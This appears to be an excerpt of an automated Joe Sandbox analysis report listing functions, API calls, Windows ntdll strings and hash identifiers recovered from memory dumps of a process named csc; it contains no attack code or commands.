                                                                                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                        • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                                                                                                        APIs
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                        • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                        • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                        • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                        • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 15c5516ea98bc023f0bd0ba1c1d8eb524569b80adc6e976db5517161ce5c0a93
                                                                                                                                                                        • Instruction ID: d25f67d17f4d2aae61594c6ad7351f4be0641aa301a75272a093f55cd9c6479d
                                                                                                                                                                        • Opcode Fuzzy Hash: 15c5516ea98bc023f0bd0ba1c1d8eb524569b80adc6e976db5517161ce5c0a93
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B09B729415C5C6DA55E760460CB2779117BD1711F59C065D20307D5F4738C1D1E275
                                                                                                                                                                        Strings
                                                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 056354B6
                                                                                                                                                                        • Critical section debug info address, xrefs: 0563541F, 0563552E
                                                                                                                                                                        • corrupted critical section, xrefs: 056354C2
                                                                                                                                                                        • double initialized or corrupted critical section, xrefs: 05635508
                                                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 05635543
                                                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056354CE
                                                                                                                                                                        • Address of the debug info found in the active list., xrefs: 056354AE, 056354FA
                                                                                                                                                                        • Thread identifier, xrefs: 0563553A
                                                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0563540A, 05635496, 05635519
                                                                                                                                                                        • Critical section address, xrefs: 05635425, 056354BC, 05635534
                                                                                                                                                                        • ICw(JCw@4Cw@4Cw, xrefs: 05635341, 0563534D
                                                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056354E2
                                                                                                                                                                        • 8, xrefs: 056352E3
                                                                                                                                                                        • Critical section address., xrefs: 05635502
                                                                                                                                                                        • undeleted critical section in freed memory, xrefs: 0563542B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$ICw(JCw@4Cw@4Cw
                                                                                                                                                                        • API String ID: 0-3651113152
                                                                                                                                                                        • Opcode ID: 6a7cf23c4c19d74894167def7b8c21bde8642152167c27efa4684a6e653a5591
                                                                                                                                                                        • Instruction ID: 44f8bc8b3a108c5e2451652e6100c1b1ff323853d73bc7bda5ea1cf62bf04240
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a7cf23c4c19d74894167def7b8c21bde8642152167c27efa4684a6e653a5591
                                                                                                                                                                        • Instruction Fuzzy Hash: 92816CB1A40358AFEB20CF94CC46FAEBBB6BF58714F10411AF506B7640D3B5A945DB50
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                        • API String ID: 2994545307-3063724069
                                                                                                                                                                        • Opcode ID: 35720eb983cc2e57ddabaf1622e90dfc4d918df3f611872c327eb70eba27b7be
                                                                                                                                                                        • Instruction ID: 666a1e6e5125b2c25b8a072a1e2a12f87bc6f82bc3b8544d16ef608ac75ba0a0
                                                                                                                                                                        • Opcode Fuzzy Hash: 35720eb983cc2e57ddabaf1622e90dfc4d918df3f611872c327eb70eba27b7be
                                                                                                                                                                        • Instruction Fuzzy Hash: 5ED1D1B2948711EBD722DA54C884B6FB7E9BF84724F000A2DFE8497250E770DD48CB92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                        • API String ID: 0-523794902
                                                                                                                                                                        • Opcode ID: fd783b0aa8d418af92327ac357b8db7038dd800a8a087b406abeac0819d625aa
                                                                                                                                                                        • Instruction ID: 009c3ae00d54d170a64df3a875d5f90849345fa596dc4ae173b20e98cfb1aba9
                                                                                                                                                                        • Opcode Fuzzy Hash: fd783b0aa8d418af92327ac357b8db7038dd800a8a087b406abeac0819d625aa
                                                                                                                                                                        • Instruction Fuzzy Hash: CF42F2312087829FE715DF28C888BBABBE6FF84304F08496DE8868B751D774D941CB56
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                        • API String ID: 0-1745908468
                                                                                                                                                                        • Opcode ID: 5b1ab5f784005c97499be572b91ec89ead3f9ae0249ff3b6a3618ef98ece1ebf
                                                                                                                                                                        • Instruction ID: 592829d374390104d479087c2021239d04f87edbb39837f9b9e52adbf2080baa
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b1ab5f784005c97499be572b91ec89ead3f9ae0249ff3b6a3618ef98ece1ebf
                                                                                                                                                                        • Instruction Fuzzy Hash: F4913231A00645DFEB12DFA8E445AADFBF2FF49710F14805DE446AB761CBB59881CB14
                                                                                                                                                                        Strings
                                                                                                                                                                        • Loading the shim user DLL failed with status 0x%08lx, xrefs: 05619A2A
                                                                                                                                                                        • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 056199ED
                                                                                                                                                                        • Getting the shim user exports failed with status 0x%08lx, xrefs: 05619A01
                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 05619A11, 05619A3A
                                                                                                                                                                        • apphelp.dll, xrefs: 055B6496
                                                                                                                                                                        • LdrpInitShimEngine, xrefs: 056199F4, 05619A07, 05619A30
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                                                        • Opcode ID: cd8c722e87f47527e4978c0be4b3e06f6298e7f2f743c6623642d97b29a4801a
                                                                                                                                                                        • Instruction ID: ae8c03b570542ef7d79747587265a06989d7a639c2cbcd989d880c16bfe70f2f
                                                                                                                                                                        • Opcode Fuzzy Hash: cd8c722e87f47527e4978c0be4b3e06f6298e7f2f743c6623642d97b29a4801a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C51F4713183049FE324DF24C85AFAB77E9FB84744F440919F9869B290DE70E944CB96
                                                                                                                                                                        Strings
                                                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0563219F
                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05632178
                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 05632165
                                                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 05632160, 0563219A, 056321BA
                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 056321BF
                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05632180
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                                                        • Opcode ID: ed0236318d4dec2cf0578a6c488c7201a0be15d4f0d0646b8519bca7ecc7fbab
                                                                                                                                                                        • Instruction ID: 121f576ee651134f4597485179cb0d0440cb357e3318c0a40b90881153dfa442
                                                                                                                                                                        • Opcode Fuzzy Hash: ed0236318d4dec2cf0578a6c488c7201a0be15d4f0d0646b8519bca7ecc7fbab
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E31267AF41225BBE721CA95CC96F6FB779FB98A40F050059FB05A7240D670AE01DBE0
                                                                                                                                                                        Strings
                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 055FC6C4
                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 05638181, 056381F5
                                                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 05638177, 056381EB
                                                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 056381E5
                                                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 05638170
                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 055FC6C3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                                                        • Opcode ID: 3da811a9d870fc49ce95dab9747fff38603ff265138ade3070506830edd85b88
                                                                                                                                                                        • Instruction ID: 4d18c9f1a8f020e3344f80f0d4c673709d3a9953a5d7a863ffa7d0bfbf5a897e
                                                                                                                                                                        • Opcode Fuzzy Hash: 3da811a9d870fc49ce95dab9747fff38603ff265138ade3070506830edd85b88
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A31E4717587069BD314EB28D94AE2A7795FF88B14F05092CF9456B391DA30DC04C7A2
                                                                                                                                                                        Strings
                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 0563031E
                                                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 056302BD
                                                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 056302E7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                                                        • Opcode ID: 3ccf7a8cf83c46dd6a4fa088164b2985e4711b06a596281b9e53139d45df9478
                                                                                                                                                                        • Instruction ID: 72eb1e44a63ce14efe3094dd830dbe8afa002c0a767e6c6bbd4b3ef3d3769978
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ccf7a8cf83c46dd6a4fa088164b2985e4711b06a596281b9e53139d45df9478
                                                                                                                                                                        • Instruction Fuzzy Hash: 25E1C1706087419FD728CF28C889B2AB7E1BF85324F140A5DF4968B7D1DB74E845CB82
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                        • API String ID: 0-1975516107
                                                                                                                                                                        • Opcode ID: 04d588843cbe4f342a6845ac3735e2b1d478719440142ab4f499594b46c5c010
                                                                                                                                                                        • Instruction ID: e95a8b9f90d3eec4dbd1113d0afea20afd7e5c4b124677b234e54cc4cacd52bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 04d588843cbe4f342a6845ac3735e2b1d478719440142ab4f499594b46c5c010
                                                                                                                                                                        • Instruction Fuzzy Hash: C451D172E083499FDB28DFA4D4857ADBFB2BF48314F14555DD8026B281DB71A981CB90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                        • API String ID: 0-3061284088
                                                                                                                                                                        • Opcode ID: c5b30ee42303030ffc6760b31396e75ddd326ac8d083e2141c4218b6e1db8ffc
                                                                                                                                                                        • Instruction ID: cae50fa7de8562db067d5a55791a2228c3610cae42e6cfe3a42d2cb8fc5a3fbe
                                                                                                                                                                        • Opcode Fuzzy Hash: c5b30ee42303030ffc6760b31396e75ddd326ac8d083e2141c4218b6e1db8ffc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B01D836229245DFF7299729940EFB2B7D4FF86A31F18405AE40147A61CBF89884D164
                                                                                                                                                                        Strings
                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 055F8422
                                                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 055F855E
                                                                                                                                                                        • @, xrefs: 055F8591
                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 055F8421
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                                                        • Opcode ID: 955097509a8f08aac1ac8dcd5b991c8e3ac736b22d903725bd47440de3e28306
                                                                                                                                                                        • Instruction ID: 1b13cade7d67dc36d6fef384d6a79209683c70545c3fbf938f1f53eafc73887f
                                                                                                                                                                        • Opcode Fuzzy Hash: 955097509a8f08aac1ac8dcd5b991c8e3ac736b22d903725bd47440de3e28306
                                                                                                                                                                        • Instruction Fuzzy Hash: 42917C71608745AFDB21EF60CC59EABBBE8FF88744F40092EFA8592150E734D944CB66
                                                                                                                                                                        Strings
                                                                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 056321D9, 056322B1
                                                                                                                                                                        • .Local, xrefs: 055F28D8
                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 056321DE
                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 056322B6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                        • API String ID: 0-1239276146
                                                                                                                                                                        • Opcode ID: 5bd6a1d9018e1e4614e9f75292a41f531a37e2eb48bd3e3aff1f08230efe6218
                                                                                                                                                                        • Instruction ID: 279cab2139ab737c85ed3097af78ed7b8c3e06a05bb8ca7e577a90379cc46aa5
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bd6a1d9018e1e4614e9f75292a41f531a37e2eb48bd3e3aff1f08230efe6218
                                                                                                                                                                        • Instruction Fuzzy Hash: 93A19A79A052299BCB34CF64DD88BA9B3B1BF58314F2545EAD909AB351D7309EC0CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 056210AE
                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0562106B
                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05620FE5
                                                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05621028
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                                                        • Opcode ID: c0ca2274653b2ed9bb924a84f1f7085ab0764cc9bfd450f473d841e391ff1bee
                                                                                                                                                                        • Instruction ID: 975ba9bdd0688357a2dbeb33ad7d8d463a87e93f2a3f4f922714031bbd72c6d4
                                                                                                                                                                        • Opcode Fuzzy Hash: c0ca2274653b2ed9bb924a84f1f7085ab0764cc9bfd450f473d841e391ff1bee
                                                                                                                                                                        • Instruction Fuzzy Hash: A7718C71A083049FCB20DF58C888FA77FA9BB85764F50046CF9498B286D774D688CBD6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
